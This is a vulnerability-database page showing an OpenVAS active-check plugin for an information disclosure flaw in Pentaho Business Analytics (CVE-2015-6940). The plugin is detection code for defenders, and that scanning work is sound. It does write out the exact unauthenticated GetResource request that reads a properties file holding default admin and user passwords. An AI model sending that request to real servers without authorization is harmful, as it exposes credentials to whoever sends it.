Lucene search
+L

Pentaho Business Analytics Information Disclosure Vulnerability - Active Check

🗓️ 24 May 2016 00:00:00Reported by Copyright (C) 2016 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 32 Views

Pentaho Business Analytics info disclosure vuln - Allows unauthenticated access to passwords properties file

Related
Refs
Code
ReporterTitlePublishedViews
Family
cnvd
CNVD
Pentaho GA PDI & Pentaho GA BA Authentication Bypass Vulnerability
17 Sep 201500:00
cnvd
cve
CVE
CVE-2015-6940
22 Sep 201515:00
cve
cvelist
Cvelist
CVE-2015-6940
22 Sep 201515:00
cvelist
euvd
EUVD
EUVD-2015-6873
7 Oct 202500:30
euvd
nvd
NVD
CVE-2015-6940
22 Sep 201515:59
nvd
openvas
OpenVAS
Pentaho Data Integration (PDI) Suite Information Disclosure Vulnerability - Active Check
24 May 201600:00
openvas
packetstorm
Packet Storm
Pentaho 5.2.x BA Suite / PDI Information Disclosure
18 Sep 201500:00
packetstorm
prion
Prion
Information disclosure
22 Sep 201515:59
prion
# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:hitachivantara:pentaho_business_analytics";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.808208");
  script_version("2025-02-25T13:24:30+0000");
  script_tag(name:"last_modification", value:"2025-02-25 13:24:30 +0000 (Tue, 25 Feb 2025)");
  script_tag(name:"creation_date", value:"2016-05-24 10:37:42 +0530 (Tue, 24 May 2016)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");

  script_cve_id("CVE-2015-6940");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"VendorFix");

  script_name("Pentaho Business Analytics Information Disclosure Vulnerability - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_pentaho_data_integration_analytics_http_detect.nasl");
  script_mandatory_keys("pentaho/data_integration_analytics/http/detected");
  script_require_ports("Services/www", 8080);

  script_tag(name:"summary", value:"Pentaho Business Analytics is prone to an information
  disclosure vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"The flaw is due to the GetResource servlet, a vestige of the
  old platform UI, allows unauthenticated access to resources in the pentaho-solutions/system
  folder. Specifically vulnerable are properties files that may reveal passwords.");

  script_tag(name:"impact", value:"Successful exploitation will allow unauthenticated access to
  properties files in the system solution which include properties files containing passwords.");

  script_tag(name:"affected", value:"Versions 4.5.x, 4.8.x, 5.0.x, 5.1.x and 5.2.x.");

  script_tag(name:"solution", value:"Apply the patch from the referenced advisory.");

  script_xref(name:"URL", value:"https://packetstormsecurity.com/files/133601");
  script_xref(name:"URL", value:"https://support.pentaho.com/hc/en-us/articles/205782329-Security-Vulnerability-Announcement-Feb-2015");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE, service: "www"))
  exit(0);

if (!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if (dir == "/")
  dir = "";

url = dir + "/GetResource?resource=system/defaultUser.spring.properties";

if (http_vuln_check(port: port, url: url, check_header: TRUE,
                    pattern:"defaultAdminUserPassword=", extra_check:"defaultNonAdminUserPassword=")) {
  report = http_report_vuln_url(port: port, url: url);
  security_message(port: port, data: report);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Feb 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
EPSS0.02295
32